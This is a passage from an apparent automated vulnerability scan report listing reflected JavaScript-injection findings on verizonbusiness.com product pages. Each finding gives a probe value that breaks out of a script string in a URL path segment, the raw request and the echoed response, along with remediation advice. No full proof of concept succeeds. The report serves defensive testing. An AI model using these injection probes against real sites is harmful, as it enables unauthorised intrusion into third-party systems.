<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/managed4b9e2';c1e1d89168d/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.300. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd06d"%3b473c39c05ed was submitted in the REST URL parameter 3. This input was echoed as bd06d";473c39c05ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/managedbd06d"%3b473c39c05ed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43492
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/managedbd06d";473c39c05ed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.301. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c62bc"%3b5758160497b was submitted in the REST URL parameter 1. This input was echoed as c62bc";5758160497b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsc62bc"%3b5758160497b/security/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:40 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsc62bc";5758160497b/security/network-based/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.302. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ad6'%3ba17eab6d31c was submitted in the REST URL parameter 1. This input was echoed as e0ad6';a17eab6d31c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse0ad6'%3ba17eab6d31c/security/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productse0ad6';a17eab6d31c/security/network-based/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.303. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97435"%3be057743c78c was submitted in the REST URL parameter 2. This input was echoed as 97435";e057743c78c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security97435"%3be057743c78c/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:02 GMT
Content-Type: text/html
Content-Length: 42329
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security97435";e057743c78c/network-based/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.304. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ef13'%3bcef8a27d79e was submitted in the REST URL parameter 2. This input was echoed as 5ef13';cef8a27d79e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security5ef13'%3bcef8a27d79e/network-based/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:11 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42327
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security5ef13';cef8a27d79e/network-based/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.305. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fdf'%3b7ee2c419acb was submitted in the REST URL parameter 3. This input was echoed as 74fdf';7ee2c419acb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/network-based74fdf'%3b7ee2c419acb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43504
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/network-based74fdf';7ee2c419acb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.306. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/network-based/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1cd2"%3b0443b9841be was submitted in the REST URL parameter 3. This input was echoed as e1cd2";0443b9841be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/network-basede1cd2"%3b0443b9841be/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43504
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/network-basede1cd2";0443b9841be/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.307. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60788"%3bdcd99a663f7 was submitted in the REST URL parameter 1. This input was echoed as 60788";dcd99a663f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products60788"%3bdcd99a663f7/security/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Date: Wed, 17 Nov 2010 00:40:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products60788";dcd99a663f7/security/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.308. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9a81'%3bde535aeb30a was submitted in the REST URL parameter 1. This input was echoed as e9a81';de535aeb30a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse9a81'%3bde535aeb30a/security/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productse9a81';de535aeb30a/security/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.309. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29fec"%3b9c8faf5d616 was submitted in the REST URL parameter 2. This input was echoed as 29fec";9c8faf5d616 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security29fec"%3b9c8faf5d616/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:49 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42319
Date: Wed, 17 Nov 2010 00:40:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security29fec";9c8faf5d616/prof-svcs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.310. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ccaf'%3baf7c4f24136 was submitted in the REST URL parameter 2. This input was echoed as 8ccaf';af7c4f24136 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security8ccaf'%3baf7c4f24136/prof-svcs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:41:03 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security8ccaf';af7c4f24136/prof-svcs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.311. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36f1d"%3b6f0599a3638 was submitted in the REST URL parameter 3. This input was echoed as 36f1d";6f0599a3638 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/prof-svcs36f1d"%3b6f0599a3638/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43498
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/prof-svcs36f1d";6f0599a3638/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.312. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/prof-svcs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8ce'%3bc6452b4e25e was submitted in the REST URL parameter 3. This input was echoed as 5d8ce';c6452b4e25e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/prof-svcs5d8ce'%3bc6452b4e25e/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43496
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:22 GMT
